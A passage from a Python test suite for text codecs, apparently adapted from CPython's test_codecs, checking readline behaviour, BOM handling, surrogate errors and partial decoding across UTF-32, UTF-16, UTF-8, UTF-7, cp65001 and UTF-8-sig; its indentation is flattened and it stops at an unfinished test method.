d = codecs.getincrementalencoder(encoding)()
d.setstate(state)
part2 = d.encode(u[i:], True)
self.assertEqual(s, part1+part2)
@yp_unittest.skip_str_codecs
class ReadTest(MixInCheckStateHandling):
def check_partial(self, input, partialresults):
# get a StreamReader for the encoding and feed the bytestring version
# of input to the reader byte by byte. Read everything available from
# the StreamReader and check that the results equal the appropriate
# entries from partialresults.
q = Queue(b"")
r = codecs.getreader(self.encoding)(q)
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
q.write(bytes([c]))
result += r.read()
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(r.read(), "")
self.assertEqual(r.bytebuffer, b"")
# do the check again, this time using a incremental decoder
d = codecs.getincrementaldecoder(self.encoding)()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
# Check whether the reset method works properly
d.reset()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
# check iterdecode()
encoded = input.encode(self.encoding)
self.assertEqual(
input,
"".join(codecs.iterdecode([bytes([c]) for c in encoded], self.encoding))
)
def test_readline(self):
def getreader(input):
stream = io.BytesIO(input.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
def readalllines(input, keepends=True, size=None):
reader = getreader(input)
lines = []
while True:
line = reader.readline(size=size, keepends=keepends)
if not line:
break
lines.append(line)
return "|".join(lines)
s = "foo\nbar\r\nbaz\rspam\u2028eggs"
sexpected = "foo\n|bar\r\n|baz\r|spam\u2028|eggs"
sexpectednoends = "foo|bar|baz|spam|eggs"
self.assertEqual(readalllines(s, True), sexpected)
self.assertEqual(readalllines(s, False), sexpectednoends)
self.assertEqual(readalllines(s, True, 10), sexpected)
self.assertEqual(readalllines(s, False, 10), sexpectednoends)
lineends = ("\n", "\r\n", "\r", "\u2028")
# Test long lines (multiple calls to read() in readline())
vw = []
vwo = []
for (i, lineend) in enumerate(lineends):
vw.append((i*200+200)*"\u3042" + lineend)
vwo.append((i*200+200)*"\u3042")
self.assertEqual(readalllines("".join(vw), True), "|".join(vw))
self.assertEqual(readalllines("".join(vw), False), "|".join(vwo))
# Test lines where the first read might end with \r, so the
# reader has to look ahead whether this is a lone \r or a \r\n
for size in range(80):
for lineend in lineends:
s = 10*(size*"a" + lineend + "xxx\n")
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=True),
size*"a" + lineend,
)
self.assertEqual(
reader.readline(keepends=True),
"xxx\n",
)
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=False),
size*"a",
)
self.assertEqual(
reader.readline(keepends=False),
"xxx",
)
def test_mixed_readline_and_read(self):
lines = ["Humpty Dumpty sat on a wall,\n",
"Humpty Dumpty had a great fall.\r\n",
"All the king's horses and all the king's men\r",
"Couldn't put Humpty together again."]
data = ''.join(lines)
def getreader():
stream = io.BytesIO(data.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
# Issue #8260: Test readline() followed by read()
f = getreader()
self.assertEqual(f.readline(), lines[0])
self.assertEqual(f.read(), ''.join(lines[1:]))
self.assertEqual(f.read(), '')
# Issue #16636: Test readline() followed by readlines()
f = getreader()
self.assertEqual(f.readline(), lines[0])
self.assertEqual(f.readlines(), lines[1:])
self.assertEqual(f.read(), '')
# Test read() followed by read()
f = getreader()
self.assertEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.read(), data[5:])
self.assertEqual(f.read(), '')
# Issue #12446: Test read() followed by readlines()
f = getreader()
self.assertEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.readlines(), [lines[0][5:]] + lines[1:])
self.assertEqual(f.read(), '')
def test_bug1175396(self):
s = [
'<%!--===================================================\r\n',
' BLOG index page: show recent articles,\r\n',
' today\'s articles, or articles of a specific date.\r\n',
'========================================================--%>\r\n',
'<%@inputencoding="ISO-8859-1"%>\r\n',
'<%@pagetemplate=TEMPLATE.y%>\r\n',
'<%@import=import frog.util, frog%>\r\n',
'<%@import=import frog.objects%>\r\n',
'<%@import=from frog.storageerrors import StorageError%>\r\n',
'<%\r\n',
'\r\n',
'import logging\r\n',
'log=logging.getLogger("Snakelets.logger")\r\n',
'\r\n',
'\r\n',
'user=self.SessionCtx.user\r\n',
'storageEngine=self.SessionCtx.storageEngine\r\n',
'\r\n',
'\r\n',
'def readArticlesFromDate(date, count=None):\r\n',
' entryids=storageEngine.listBlogEntries(date)\r\n',
' entryids.reverse() # descending\r\n',
' if count:\r\n',
' entryids=entryids[:count]\r\n',
' try:\r\n',
' return [ frog.objects.BlogEntry.load(storageEngine, date, Id) for Id in entryids ]\r\n',
' except StorageError,x:\r\n',
' log.error("Error loading articles: "+str(x))\r\n',
' self.abort("cannot load articles")\r\n',
'\r\n',
'showdate=None\r\n',
'\r\n',
'arg=self.Request.getArg()\r\n',
'if arg=="today":\r\n',
' #-------------------- TODAY\'S ARTICLES\r\n',
' self.write("<h2>Today\'s articles</h2>")\r\n',
' showdate = frog.util.isodatestr() \r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'elif arg=="active":\r\n',
' #-------------------- ACTIVE ARTICLES redirect\r\n',
' self.Yredirect("active.y")\r\n',
'elif arg=="login":\r\n',
' #-------------------- LOGIN PAGE redirect\r\n',
' self.Yredirect("login.y")\r\n',
'elif arg=="date":\r\n',
' #-------------------- ARTICLES OF A SPECIFIC DATE\r\n',
' showdate = self.Request.getParameter("date")\r\n',
' self.write("<h2>Articles written on %s</h2>"% frog.util.mediumdatestr(showdate))\r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'else:\r\n',
' #-------------------- RECENT ARTICLES\r\n',
' self.write("<h2>Recent articles</h2>")\r\n',
' dates=storageEngine.listBlogEntryDates()\r\n',
' if dates:\r\n',
' entries=[]\r\n',
' SHOWAMOUNT=10\r\n',
' for showdate in dates:\r\n',
' entries.extend( readArticlesFromDate(showdate, SHOWAMOUNT-len(entries)) )\r\n',
' if len(entries)>=SHOWAMOUNT:\r\n',
' break\r\n',
' \r\n',
]
stream = io.BytesIO("".join(s).encode(self.encoding))
reader = codecs.getreader(self.encoding)(stream)
for (i, line) in enumerate(reader):
self.assertEqual(line, s[i])
def test_readlinequeue(self):
q = Queue(b"")
writer = codecs.getwriter(self.encoding)(q)
reader = codecs.getreader(self.encoding)(q)
# No lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=False), "foo")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=False), "")
self.assertEqual(reader.readline(keepends=False), "bar")
writer.write("baz")
self.assertEqual(reader.readline(keepends=False), "baz")
self.assertEqual(reader.readline(keepends=False), "")
# Lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=True), "foo\r")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=True), "\n")
self.assertEqual(reader.readline(keepends=True), "bar\r")
writer.write("baz")
self.assertEqual(reader.readline(keepends=True), "baz")
self.assertEqual(reader.readline(keepends=True), "")
writer.write("foo\r\n")
self.assertEqual(reader.readline(keepends=True), "foo\r\n")
def test_bug1098990_a(self):
s1 = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\r\n"
s2 = "offending line: ladfj askldfj klasdj fskla dfzaskdj fasklfj laskd fjasklfzzzzaa%whereisthis!!!\r\n"
s3 = "next line.\r\n"
s = (s1+s2+s3).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), "")
def test_bug1098990_b(self):
s1 = "aaaaaaaaaaaaaaaaaaaaaaaa\r\n"
s2 = "bbbbbbbbbbbbbbbbbbbbbbbb\r\n"
s3 = "stillokay:bbbbxx\r\n"
s4 = "broken!!!!badbad\r\n"
s5 = "againokay.\r\n"
s = (s1+s2+s3+s4+s5).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), s4)
self.assertEqual(reader.readline(), s5)
self.assertEqual(reader.readline(), "")
ill_formed_sequence_replace = "\ufffd"
def test_lone_surrogates(self):
self.assertRaises(UnicodeEncodeError, "\ud800".encode, self.encoding)
self.assertEqual("[\uDC80]".encode(self.encoding, "backslashreplace"),
"[\\udc80]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "xmlcharrefreplace"),
"[�]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "ignore"),
"[]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "replace"),
"[?]".encode(self.encoding))
bom = "".encode(self.encoding)
for before, after in [("\U00010fff", "A"), ("[", "]"),
("A", "\U00010fff")]:
before_sequence = before.encode(self.encoding)[len(bom):]
after_sequence = after.encode(self.encoding)[len(bom):]
test_string = before + "\uDC80" + after
test_sequence = (bom + before_sequence +
self.ill_formed_sequence + after_sequence)
self.assertRaises(UnicodeDecodeError, test_sequence.decode,
self.encoding)
self.assertEqual(test_string.encode(self.encoding,
"surrogatepass"),
test_sequence)
self.assertEqual(test_sequence.decode(self.encoding,
"surrogatepass"),
test_string)
self.assertEqual(test_sequence.decode(self.encoding, "ignore"),
before + after)
self.assertEqual(test_sequence.decode(self.encoding, "replace"),
before + self.ill_formed_sequence_replace + after)
@yp_unittest.skip_str_codecs
class UTF32Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-32"
if sys.byteorder == 'little':
ill_formed_sequence = b"\x80\xdc\x00\x00"
else:
ill_formed_sequence = b"\x00\x00\xdc\x80"
spamle = (b'\xff\xfe\x00\x00'
b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00'
b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00')
spambe = (b'\x00\x00\xfe\xff'
b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m'
b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m')
def test_only_one_bom(self):
_,_,reader,writer = codecs.lookup(self.encoding)
# encode some stream
s = io.BytesIO()
f = writer(s)
f.write("spam")
f.write("spam")
d = s.getvalue()
# check whether there is exactly one BOM in it
self.assertTrue(d == self.spamle or d == self.spambe)
# try to read it back
s = io.BytesIO(d)
f = reader(s)
self.assertEqual(f.read(), "spamspam")
def test_badbom(self):
s = io.BytesIO(4*b"\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
s = io.BytesIO(8*b"\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"", # first byte of BOM read
"", # second byte of BOM read
"", # third byte of BOM read
"", # fourth byte of BOM read => byteorder known
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_handlers(self):
self.assertEqual(('\ufffd', 1),
codecs.utf_32_decode(b'\x01', 'replace', True))
self.assertEqual(('', 1),
codecs.utf_32_decode(b'\x01', 'ignore', True))
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_decode,
b"\xff", "strict", True)
def test_decoder_state(self):
self.check_state_handling_decode(self.encoding,
"spamspam", self.spamle)
self.check_state_handling_decode(self.encoding,
"spamspam", self.spambe)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded_le = b'\xff\xfe\x00\x00' + b'\x00\x00\x01\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_decode(encoded_le)[0])
encoded_be = b'\x00\x00\xfe\xff' + b'\x00\x01\x00\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_decode(encoded_be)[0])
@yp_unittest.skip_str_codecs
class UTF32LETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-32-le"
ill_formed_sequence = b"\x80\xdc\x00\x00"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_simple(self):
self.assertEqual("\U00010203".encode(self.encoding), b"\x03\x02\x01\x00")
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_le_decode,
b"\xff", "strict", True)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded = b'\x00\x00\x01\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_le_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF32BETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-32-be"
ill_formed_sequence = b"\x00\x00\xdc\x80"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_simple(self):
self.assertEqual("\U00010203".encode(self.encoding), b"\x00\x01\x02\x03")
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_be_decode,
b"\xff", "strict", True)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded = b'\x00\x01\x00\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_be_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF16Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-16"
if sys.byteorder == 'little':
ill_formed_sequence = b"\x80\xdc"
else:
ill_formed_sequence = b"\xdc\x80"
spamle = b'\xff\xfes\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
spambe = b'\xfe\xff\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'
def test_only_one_bom(self):
_,_,reader,writer = codecs.lookup(self.encoding)
# encode some stream
s = io.BytesIO()
f = writer(s)
f.write("spam")
f.write("spam")
d = s.getvalue()
# check whether there is exactly one BOM in it
self.assertTrue(d == self.spamle or d == self.spambe)
# try to read it back
s = io.BytesIO(d)
f = reader(s)
self.assertEqual(f.read(), "spamspam")
def test_badbom(self):
s = io.BytesIO(b"\xff\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
s = io.BytesIO(b"\xff\xff\xff\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"", # first byte of BOM read
"", # second byte of BOM read => byteorder known
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_handlers(self):
self.assertEqual(('\ufffd', 1),
codecs.utf_16_decode(b'\x01', 'replace', True))
self.assertEqual(('', 1),
codecs.utf_16_decode(b'\x01', 'ignore', True))
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_16_decode,
b"\xff", "strict", True)
def test_decoder_state(self):
self.check_state_handling_decode(self.encoding,
"spamspam", self.spamle)
self.check_state_handling_decode(self.encoding,
"spamspam", self.spambe)
def test_bug691291(self):
# Files are always opened in binary mode, even if no binary mode was
# specified. This means that no automatic conversion of '\n' is done
# on reading and writing.
s1 = 'Hello\r\nworld\r\n'
s = s1.encode(self.encoding)
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, 'wb') as fp:
fp.write(s)
with support.check_warnings(('', DeprecationWarning)):
reader = codecs.open(support.TESTFN, 'U', encoding=self.encoding)
with reader:
self.assertEqual(reader.read(), s1)
@yp_unittest.skip_str_codecs
class UTF16LETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-16-le"
ill_formed_sequence = b"\x80\xdc"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_errors(self):
tests = [
(b'\xff', '\ufffd'),
(b'A\x00Z', 'A\ufffd'),
(b'A\x00B\x00C\x00D\x00Z', 'ABCD\ufffd'),
(b'\x00\xd8', '\ufffd'),
(b'\x00\xd8A', '\ufffd'),
(b'\x00\xd8A\x00', '\ufffdA'),
(b'\x00\xdcA\x00', '\ufffdA'),
]
for raw, expected in tests:
self.assertRaises(UnicodeDecodeError, codecs.utf_16_le_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-16le', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual("\U00010203".encode(self.encoding),
b'\x00\xd8\x03\xde')
self.assertEqual(b'\x00\xd8\x03\xde'.decode(self.encoding),
"\U00010203")
@yp_unittest.skip_str_codecs
class UTF16BETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-16-be"
ill_formed_sequence = b"\xdc\x80"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_errors(self):
tests = [
(b'\xff', '\ufffd'),
(b'\x00A\xff', 'A\ufffd'),
(b'\x00A\x00B\x00C\x00DZ', 'ABCD\ufffd'),
(b'\xd8\x00', '\ufffd'),
(b'\xd8\x00\xdc', '\ufffd'),
(b'\xd8\x00\x00A', '\ufffdA'),
(b'\xdc\x00\x00A', '\ufffdA'),
]
for raw, expected in tests:
self.assertRaises(UnicodeDecodeError, codecs.utf_16_be_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-16be', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual("\U00010203".encode(self.encoding),
b'\xd8\x00\xde\x03')
self.assertEqual(b'\xd8\x00\xde\x03'.decode(self.encoding),
"\U00010203")
class UTF8Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-8"
ill_formed_sequence = b"\xed\xb2\x80"
ill_formed_sequence_replace = "\ufffd" * 3
def test_partial(self):
self.check_partial(
"\x00\xff\u07ff\u0800\uffff\U00010000",
[
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u07ff",
"\x00\xff\u07ff",
"\x00\xff\u07ff",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff\U00010000",
]
)
def test_decoder_state(self):
u = "\x00\x7f\x80\xff\u0100\u07ff\u0800\uffff\U0010ffff"
self.check_state_handling_decode(self.encoding,
u, u.encode(self.encoding))
def test_lone_surrogates(self):
super().test_lone_surrogates()
# not sure if this is making sense for
# UTF-16 and UTF-32
self.assertEqual("[\uDC80]".encode('utf-8', "surrogateescape"),
b'[\x80]')
def test_surrogatepass_handler(self):
self.assertEqual("abc\ud800def".encode("utf-8", "surrogatepass"),
b"abc\xed\xa0\x80def")
self.assertEqual(b"abc\xed\xa0\x80def".decode("utf-8", "surrogatepass"),
"abc\ud800def")
self.assertEqual("\U00010fff\uD800".encode("utf-8", "surrogatepass"),
b"\xf0\x90\xbf\xbf\xed\xa0\x80")
self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("utf-8", "surrogatepass"),
"\U00010fff\uD800")
self.assertTrue(codecs.lookup_error("surrogatepass"))
with self.assertRaises(UnicodeDecodeError):
b"abc\xed\xa0".decode("utf-8", "surrogatepass")
with self.assertRaises(UnicodeDecodeError):
b"abc\xed\xa0z".decode("utf-8", "surrogatepass")
@yp_unittest.skipUnless(sys.platform == 'win32',
'cp65001 is a Windows-only codec')
@yp_unittest.skip_str_codecs
class CP65001Test(ReadTest, yp_unittest.TestCase):
encoding = "cp65001"
def test_encode(self):
tests = [
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xc3\xa9\xe2\x82\xac'),
('\U0010ffff', 'strict', b'\xf4\x8f\xbf\xbf'),
]
if VISTA_OR_LATER:
tests.extend((
('\udc80', 'strict', None),
('\udc80', 'ignore', b''),
('\udc80', 'replace', b'?'),
('\udc80', 'backslashreplace', b'\\udc80'),
('\udc80', 'surrogatepass', b'\xed\xb2\x80'),
))
else:
tests.append(('\udc80', 'strict', b'\xed\xb2\x80'))
for text, errors, expected in tests:
if expected is not None:
try:
encoded = text.encode('cp65001', errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to cp65001 with '
'errors=%r: %s' % (text, errors, err))
self.assertEqual(encoded, expected,
'%a.encode("cp65001", %r)=%a != %a'
% (text, errors, encoded, expected))
else:
self.assertRaises(UnicodeEncodeError,
text.encode, "cp65001", errors)
def test_decode(self):
tests = [
(b'abc', 'strict', 'abc'),
(b'\xc3\xa9\xe2\x82\xac', 'strict', '\xe9\u20ac'),
(b'\xf4\x8f\xbf\xbf', 'strict', '\U0010ffff'),
(b'\xef\xbf\xbd', 'strict', '\ufffd'),
(b'[\xc3\xa9]', 'strict', '[\xe9]'),
# invalid bytes
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
]
if VISTA_OR_LATER:
tests.extend((
(b'[\xed\xb2\x80]', 'strict', None),
(b'[\xed\xb2\x80]', 'ignore', '[]'),
(b'[\xed\xb2\x80]', 'replace', '[\ufffd\ufffd\ufffd]'),
))
else:
tests.extend((
(b'[\xed\xb2\x80]', 'strict', '[\udc80]'),
))
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = raw.decode('cp65001', errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from cp65001 with '
'errors=%r: %s' % (raw, errors, err))
self.assertEqual(decoded, expected,
'%a.decode("cp65001", %r)=%a != %a'
% (raw, errors, decoded, expected))
else:
self.assertRaises(UnicodeDecodeError,
raw.decode, 'cp65001', errors)
@yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
def test_lone_surrogates(self):
self.assertRaises(UnicodeEncodeError, "\ud800".encode, "cp65001")
self.assertRaises(UnicodeDecodeError, b"\xed\xa0\x80".decode, "cp65001")
self.assertEqual("[\uDC80]".encode("cp65001", "backslashreplace"),
b'[\\udc80]')
self.assertEqual("[\uDC80]".encode("cp65001", "xmlcharrefreplace"),
b'[�]')
self.assertEqual("[\uDC80]".encode("cp65001", "surrogateescape"),
b'[\x80]')
self.assertEqual("[\uDC80]".encode("cp65001", "ignore"),
b'[]')
self.assertEqual("[\uDC80]".encode("cp65001", "replace"),
b'[?]')
@yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
def test_surrogatepass_handler(self):
self.assertEqual("abc\ud800def".encode("cp65001", "surrogatepass"),
b"abc\xed\xa0\x80def")
self.assertEqual(b"abc\xed\xa0\x80def".decode("cp65001", "surrogatepass"),
"abc\ud800def")
self.assertEqual("\U00010fff\uD800".encode("cp65001", "surrogatepass"),
b"\xf0\x90\xbf\xbf\xed\xa0\x80")
self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("cp65001", "surrogatepass"),
"\U00010fff\uD800")
self.assertTrue(codecs.lookup_error("surrogatepass"))
def test_readline(self):
self.skipTest("issue #20571: code page 65001 codec does not "
"support partial decoder yet")
@yp_unittest.skip_str_codecs
class UTF7Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-7"
def test_partial(self):
self.check_partial(
'a+-b\x00c\x80d\u0100e\U00010000f',
[
'a',
'a',
'a+',
'a+-',
'a+-b',
'a+-b',
'a+-b',
'a+-b',
'a+-b',
'a+-b\x00',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c\x80',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d\u0100',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e\U00010000',
'a+-b\x00c\x80d\u0100e\U00010000f',
]
)
def test_errors(self):
tests = [
(b'a\xffb', 'a\ufffdb'),
(b'a+IK', 'a\ufffd'),
(b'a+IK-b', 'a\ufffdb'),
(b'a+IK,b', 'a\ufffdb'),
(b'a+IKx', 'a\u20ac\ufffd'),
(b'a+IKx-b', 'a\u20ac\ufffdb'),
(b'a+IKwgr', 'a\u20ac\ufffd'),
(b'a+IKwgr-b', 'a\u20ac\ufffdb'),
(b'a+IKwgr,', 'a\u20ac\ufffd'),
(b'a+IKwgr,-b', 'a\u20ac\ufffd-b'),
(b'a+IKwgrB', 'a\u20ac\u20ac\ufffd'),
(b'a+IKwgrB-b', 'a\u20ac\u20ac\ufffdb'),
(b'a+/,+IKw-b', 'a\ufffd\u20acb'),
(b'a+//,+IKw-b', 'a\ufffd\u20acb'),
(b'a+///,+IKw-b', 'a\uffff\ufffd\u20acb'),
(b'a+////,+IKw-b', 'a\uffff\ufffd\u20acb'),
]
for raw, expected in tests:
with self.subTest(raw=raw):
self.assertRaises(UnicodeDecodeError, codecs.utf_7_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-7', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual('\U000104A0'.encode(self.encoding), b'+2AHcoA-')
self.assertEqual('\ud801\udca0'.encode(self.encoding), b'+2AHcoA-')
self.assertEqual(b'+2AHcoA-'.decode(self.encoding), '\U000104A0')
test_lone_surrogates = None
@yp_unittest.skip_str_codecs
class UTF16ExTest(yp_unittest.TestCase):
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_16_ex_decode, b"\xff", "strict", 0, True)
def test_bad_args(self):
self.assertRaises(TypeError, codecs.utf_16_ex_decode)
@yp_unittest.skip_str_codecs
class ReadBufferTest(yp_unittest.TestCase):
def test_array(self):
import array
self.assertEqual(
codecs.readbuffer_encode(array.array("b", b"spam")),
(b"spam", 4)
)
def test_empty(self):
self.assertEqual(codecs.readbuffer_encode(""), (b"", 0))
def test_bad_args(self):
self.assertRaises(TypeError, codecs.readbuffer_encode)
self.assertRaises(TypeError, codecs.readbuffer_encode, 42)
@yp_unittest.skip_str_codecs
class UTF8SigTest(UTF8Test, yp_unittest.TestCase):
encoding = "utf-8-sig"
def test_partial(self):
self.check_partial(
"\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
[
"",
"",
"", # First BOM has been read and skipped
"",
"",
"\ufeff", # Second BOM has been read and emitted
"\ufeff\x00", # "\x00" read and emitted
"\ufeff\x00", # First byte of encoded "\xff" read
"\ufeff\x00\xff", # Second byte of encoded "\xff" read
"\ufeff\x00\xff", # First byte of encoded "\u07ff" read
"\ufeff\x00\xff\u07ff", # Second byte of encoded "\u07ff" read
"\ufeff\x00\xff\u07ff",
"\ufeff\x00\xff\u07ff",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff",
"\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
]
)
def test_bug1601501(self):
# SF bug #1601501: check that the codec works with a buffer
self.assertEqual(str(b"\xef\xbb\xbf", "utf-8-sig"), "")
def test_bom(self):
